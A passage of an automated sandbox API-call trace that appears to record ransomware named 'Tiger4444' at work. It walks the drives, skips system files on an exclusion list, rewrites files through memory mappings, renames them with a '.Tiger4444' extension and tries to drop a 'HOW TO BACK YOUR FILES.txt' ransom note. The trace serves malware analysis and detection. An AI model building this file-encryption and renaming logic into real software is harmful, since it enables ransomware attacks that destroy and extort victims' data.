hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc849b8 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c18 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0037.970] QueryPerformanceCounter (in: lpPerformanceCount=0x2fabf90 | out: lpPerformanceCount=0x2fabf90*=12942349217) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0037.971] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0037.971] CloseHandle (hObject=0x284) returned 1 [0037.971] CloseHandle (hObject=0x280) returned 1 [0037.971] wsprintfW (in: param_1=0x2fac290, param_2="%s.%s" | out: param_1="Z:\\System Volume Information\\tracking.log.Tiger4444") returned 51 [0037.971] MoveFileExW (lpExistingFileName="Z:\\System Volume Information\\tracking.log" (normalized: "z:\\system volume information\\tracking.log"), lpNewFileName="Z:\\System Volume Information\\tracking.log.Tiger4444" (normalized: "z:\\system volume information\\tracking.log.tiger4444"), dwFlags=0x1) returned 1 [0037.971] InterlockedExchangeAdd (in: Addend=0xc6fac0, Value=20480 | out: Addend=0xc6fac0) returned 0 [0037.971] InterlockedExchangeAdd (in: Addend=0xc6facc, Value=14 | out: Addend=0xc6facc) returned 0 [0037.971] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x2fadfb0 | out: lpFindFileData=0x2fadfb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8983e192, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracking.log", cAlternateFileName="")) returned 0 [0037.971] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0037.972] lstrcpyW (in: lpString1=0x2faeb3a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0037.972] CreateFileW (lpFileName="Z:\\System Volume Information\\HOW TO BACK YOUR FILES.txt" (normalized: "z:\\system volume information\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0037.972] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0037.972] CloseHandle (hObject=0x0) returned 0 [0037.972] CloseHandle (hObject=0xffffffff) returned 1 [0037.972] GetCurrentThreadId () returned 0xdcc [0037.972] RtlInterlockedPopEntrySList (in: ListHead=0xc66848 | out: ListHead=0xc66848) returned 0x0 [0037.972] GetCurrentThreadId () returned 0xdcc [0037.972] WaitForMultipleObjects (nCount=0x0, lpHandles=0x2fae200*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0037.972] RtlInterlockedPopEntrySList (in: ListHead=0xc66848 | out: ListHead=0xc66848) returned 0x0 [0037.972] RtlInterlockedFlushSList (in: ListHead=0xc66848 | out: ListHead=0xc66848) returned 0x0 [0037.972] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66840 | out: hHeap=0xc50000) returned 1 [0037.972] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6fab0 | out: hHeap=0xc50000) returned 1 Thread: id = 12 os_tid = 0xfa8 [0037.914] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66588 [0037.914] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:", iMaxLength=2048 | out: lpString1="C:") returned="C:" [0037.914] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0037.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66580 | out: hHeap=0xc50000) returned 1 [0037.915] lstrcatW (in: lpString1="", lpString2="C:" | out: lpString1="C:") returned="C:" [0037.915] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0037.915] lstrcatW (in: lpString1="C:\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\.BFC0E91B00AE8A0620D3") returned="C:\\.BFC0E91B00AE8A0620D3" [0037.915] CreateFileW (lpFileName="C:\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0037.983] WriteFile (in: hFile=0x280, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0038.052] FlushFileBuffers (hFile=0x280) returned 1 [0038.054] SetFileAttributesW (lpFileName="C:\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0038.054] CloseHandle (hObject=0x280) returned 1 [0038.055] lstrlenW (lpString="C:") returned 2 [0038.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0038.055] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0xc72dc8 [0038.055] lstrcmpiW (lpString1="$GetCurrent", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.055] lstrcmpiW (lpString1="$GetCurrent", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.055] lstrcmpiW (lpString1="$GetCurrent", lpString2="Tiger4444.exe") returned -1 [0038.055] lstrcmpiW (lpString1="$GetCurrent", lpString2=".") returned -1 [0038.055] lstrcmpiW (lpString1="$GetCurrent", lpString2="..") returned -1 [0038.055] lstrcmpiW (lpString1="$GetCurrent", lpString2="windows") returned -1 [0038.056] lstrcmpiW (lpString1="$GetCurrent", lpString2="bootmgr") returned -1 [0038.056] lstrcmpiW (lpString1="$GetCurrent", lpString2="pagefile.sys") returned -1 [0038.056] lstrcmpiW (lpString1="$GetCurrent", lpString2="boot") returned -1 [0038.056] lstrcmpiW (lpString1="$GetCurrent", lpString2="ids.txt") returned -1 [0038.056] lstrcmpiW (lpString1="$GetCurrent", lpString2="NTUSER.DAT") returned -1 [0038.056] lstrcpyW (in: lpString1=0x30aeaae, lpString2="$GetCurrent" | out: lpString1="$GetCurrent") returned="$GetCurrent" [0038.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66840 [0038.056] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1e) returned 0xc6fab0 [0038.056] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66848 | out: ListHead=0xc66828, ListEntry=0xc66848) returned 0x0 [0038.056] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Tiger4444.exe") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="windows") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="bootmgr") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="pagefile.sys") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="boot") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="ids.txt") returned -1 [0038.056] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="NTUSER.DAT") returned -1 [0038.056] lstrcpyW (in: lpString1=0x30aeaae, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0038.056] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin", dwFileAttributes=0x12) returned 1 [0038.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66580 [0038.057] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x20) returned 0xc6fb00 [0038.057] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66588 | out: ListHead=0xc66828, ListEntry=0xc66588) returned 0xc66848 [0038.057] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="Tiger4444.exe") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2=".") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="..") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="windows") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="bootmgr") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="pagefile.sys") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="boot") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="ids.txt") returned -1 [0038.057] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="NTUSER.DAT") returned -1 [0038.057] lstrcpyW (in: lpString1=0x30aeaae, lpString2="$WINRE_BACKUP_PARTITION.MARKER" | out: lpString1="$WINRE_BACKUP_PARTITION.MARKER") returned="$WINRE_BACKUP_PARTITION.MARKER" [0038.057] SetFileAttributesW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER", dwFileAttributes=0x2) returned 1 [0038.065] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0038.065] lstrlenW (lpString="Tiger4444") returned 9 [0038.065] lstrcmpiW (lpString1="ON.MARKER", lpString2="Tiger4444") returned -1 [0038.065] lstrlenW (lpString=".dll") returned 4 [0038.066] lstrcmpiW (lpString1="RKER", lpString2=".dll") returned 1 [0038.066] lstrlenW (lpString=".lnk") returned 4 [0038.066] lstrcmpiW (lpString1="RKER", lpString2=".lnk") returned 1 [0038.066] lstrlenW (lpString=".ini") returned 4 [0038.066] lstrcmpiW (lpString1="RKER", lpString2=".ini") returned 1 [0038.066] lstrlenW (lpString=".sys") returned 4 [0038.066] lstrcmpiW (lpString1="RKER", lpString2=".sys") returned 1 [0038.066] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7ba81712, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7ba81712, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7bb4034b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0038.066] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.066] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0038.066] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Tiger4444.exe") returned -1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2=".") returned 1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="..") returned 1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="windows") returned -1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="bootmgr") returned -1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="pagefile.sys") returned -1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="boot") returned -1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="ids.txt") returned -1 [0038.066] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="NTUSER.DAT") returned -1 [0038.066] lstrcpyW (in: lpString1=0x30aeaae, lpString2="588bce7c90097ed212" | out: lpString1="588bce7c90097ed212") returned="588bce7c90097ed212" [0038.066] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663e0 [0038.066] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2c) returned 0xc67b10 [0038.066] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663e8 | out: ListHead=0xc66828, ListEntry=0xc663e8) returned 0xc66588 [0038.066] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2="Tiger4444.exe") returned -1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2=".") returned 1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2="..") returned 1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2="windows") returned -1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2="bootmgr") returned -1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2="pagefile.sys") returned -1 [0038.066] lstrcmpiW (lpString1="Boot", lpString2="boot") returned 0 [0038.066] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0038.066] lstrcmpiW (lpString1="bootmgr", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.066] lstrcmpiW (lpString1="bootmgr", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.066] lstrcmpiW (lpString1="bootmgr", lpString2="Tiger4444.exe") returned -1 [0038.066] lstrcmpiW (lpString1="bootmgr", lpString2=".") returned 1 [0038.067] lstrcmpiW (lpString1="bootmgr", lpString2="..") returned 1 [0038.067] lstrcmpiW (lpString1="bootmgr", lpString2="windows") returned -1 [0038.067] lstrcmpiW (lpString1="bootmgr", lpString2="bootmgr") returned 0 [0038.067] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="Tiger4444.exe") returned -1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2=".") returned 1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="..") returned 1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="windows") returned -1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="bootmgr") returned 1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="pagefile.sys") returned -1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="boot") returned 1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="ids.txt") returned -1 [0038.067] lstrcmpiW (lpString1="BOOTNXT", lpString2="NTUSER.DAT") returned -1 [0038.067] lstrcpyW (in: lpString1=0x30aeaae, lpString2="BOOTNXT" | out: lpString1="BOOTNXT") returned="BOOTNXT" [0038.067] SetFileAttributesW (lpFileName="C:\\BOOTNXT", dwFileAttributes=0x22) returned 1 [0038.127] SetFileAttributesW (lpFileName="C:\\BOOTNXT", dwFileAttributes=0x6) returned 1 [0038.127] lstrlenW (lpString="BOOTNXT") returned 7 [0038.127] lstrlenW (lpString="Tiger4444") returned 9 [0038.127] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0038.127] lstrlenW (lpString=".dll") returned 4 [0038.127] lstrcmpiW (lpString1="TNXT", lpString2=".dll") returned 1 [0038.127] lstrlenW (lpString=".lnk") returned 4 [0038.127] lstrcmpiW (lpString1="TNXT", lpString2=".lnk") returned 1 [0038.127] lstrlenW (lpString=".ini") returned 4 [0038.127] lstrcmpiW (lpString1="TNXT", lpString2=".ini") returned 1 [0038.127] lstrlenW (lpString=".sys") returned 4 [0038.127] lstrcmpiW (lpString1="TNXT", lpString2=".sys") returned 1 [0038.127] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x290 [0038.127] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0038.127] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=12958137830) returned 1 [0038.129] GetFileSizeEx (in: hFile=0x290, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1) returned 1 [0038.129] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc60fe8 [0038.129] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0038.129] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x294 [0038.130] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0xbe0000 [0038.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0038.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0038.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0038.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0038.137] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0038.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0038.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0038.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0038.137] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=12959041875) returned 1 [0038.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0038.137] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0038.137] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0038.138] CloseHandle (hObject=0x294) returned 1 [0038.138] CloseHandle (hObject=0x290) returned 1 [0038.139] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\BOOTNXT.Tiger4444") returned 20 [0038.139] MoveFileExW (lpExistingFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), lpNewFileName="C:\\BOOTNXT.Tiger4444" (normalized: "c:\\bootnxt.tiger4444"), dwFlags=0x1) returned 1 [0038.139] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=16 | out: Addend=0xc6f980) returned 0 [0038.139] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=9 | out: Addend=0xc6f98c) returned 0 [0038.139] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0038.139] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.139] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Tiger4444.exe") returned -1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="windows") returned -1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootmgr") returned 1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="pagefile.sys") returned -1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="boot") returned 1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ids.txt") returned -1 [0038.140] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="NTUSER.DAT") returned -1 [0038.140] lstrcpyW (in: lpString1=0x30aeaae, lpString2="BOOTSECT.BAK" | out: lpString1="BOOTSECT.BAK") returned="BOOTSECT.BAK" [0038.140] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0038.140] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x23) returned 1 [0038.140] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x7) returned 1 [0038.141] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0038.141] lstrlenW (lpString="Tiger4444") returned 9 [0038.141] lstrcmpiW (lpString1="TSECT.BAK", lpString2="Tiger4444") returned 1 [0038.141] lstrlenW (lpString=".dll") returned 4 [0038.141] lstrcmpiW (lpString1=".BAK", lpString2=".dll") returned -1 [0038.141] lstrlenW (lpString=".lnk") returned 4 [0038.141] lstrcmpiW (lpString1=".BAK", lpString2=".lnk") returned -1 [0038.141] lstrlenW (lpString=".ini") returned 4 [0038.141] lstrcmpiW (lpString1=".BAK", lpString2=".ini") returned -1 [0038.141] lstrlenW (lpString=".sys") returned 4 [0038.141] lstrcmpiW (lpString1=".BAK", lpString2=".sys") returned -1 [0038.141] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0038.141] GetLastError () returned 0x5 [0038.141] wsprintfA (in: param_1=0x30ad238, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\BOOTSECT.BAK _CreateFile error 5\r\n") returned 45 [0038.141] lstrlenA (lpString="[ERROR] C:\\BOOTSECT.BAK _CreateFile error 5\r\n") returned 45 [0038.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x290 [0038.141] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x42a 